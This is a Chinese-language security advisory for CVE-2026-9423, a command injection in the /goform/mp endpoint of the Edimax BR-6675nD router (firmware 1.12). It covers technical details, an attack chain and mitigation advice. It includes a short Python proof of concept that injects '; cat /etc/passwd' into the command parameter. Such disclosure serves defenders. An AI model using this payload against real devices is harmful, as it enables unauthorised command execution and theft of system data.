CVE-2026-9423 CVSS 4.7 中危

CVE-2026-9423 Edimax路由器命令注入漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9423

漏洞类型

命令注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Edimax BR-6675nD

漏洞概述

Edimax BR-6675nD路由器（版本1.12）存在安全漏洞，位于/goform/mp组件的POST请求处理程序中。由于未正确过滤'command'参数，导致命令注入。攻击者需高权限且可远程发起攻击，成功利用将危及系统机密性、完整性和可用性。目前厂商尚未回应，利用代码已公开。

技术细节

该漏洞的根源在于Edimax BR-6675nD路由器固件版本1.12中，`/goform/mp`组件的POST请求处理函数存在输入验证缺失。具体来说，当服务器接收到针对`/goform/mp`的HTTP POST请求时，会直接读取用户提交的`command`参数，并将其传递给后端的系统调用函数（如`system()`），而未进行任何安全过滤或转义。攻击者可以利用这一缺陷，在`command`参数中注入分号（;）、管道符（|）等Shell元字符，从而拼接并执行任意操作系统命令。尽管CVSS评分要求高权限（PR:H），这意味着攻击者通常需要先获取管理员权限，但一旦拥有权限，该漏洞即可被用于在设备上执行任意系统命令，导致信息泄露或系统被完全控制。

攻击链分析

STEP 1

侦察阶段

攻击者扫描网络，识别目标设备为Edimax BR-6675nD路由器，并确认其版本为1.12。

STEP 2

获取权限

由于漏洞需要高权限（PR:H），攻击者通过暴力破解、钓鱼或利用其他漏洞获取路由器的管理员登录凭证。

STEP 3

漏洞利用

攻击者使用获取的凭证登录后台，向/goform/mp接口发送特制的POST请求，在command参数中注入恶意Shell命令。

STEP 4

执行命令

路由器后端未过滤参数，直接执行注入的系统命令，攻击者从而获得设备控制权或窃取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable endpoint
target_url = "http://<TARGET_IP>/goform/mp"

# The vulnerable parameter 'command' with injection payload
# Example payload: cat /etc/passwd
payload = "; cat /etc/passwd"

data = {
    "command": payload
}

# Sending the POST request
# Note: Authentication (High Privileges) is typically required
response = requests.post(target_url, data=data)

# Output the response
print("Status Code:", response.status_code)
print("Response Body:", response.text)

影响范围

Edimax BR-6675nD 1.12

防御指南

临时缓解措施

由于厂商尚未发布补丁，建议用户立即禁用路由器的远程Web管理功能，仅通过本地连接进行管理。同时，应在网络边界防火墙上设置严格的访问控制策略，禁止外部网络直接访问路由器的管理接口。如果可能，考虑将受影响设备更换为已修复或受支持的产品。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表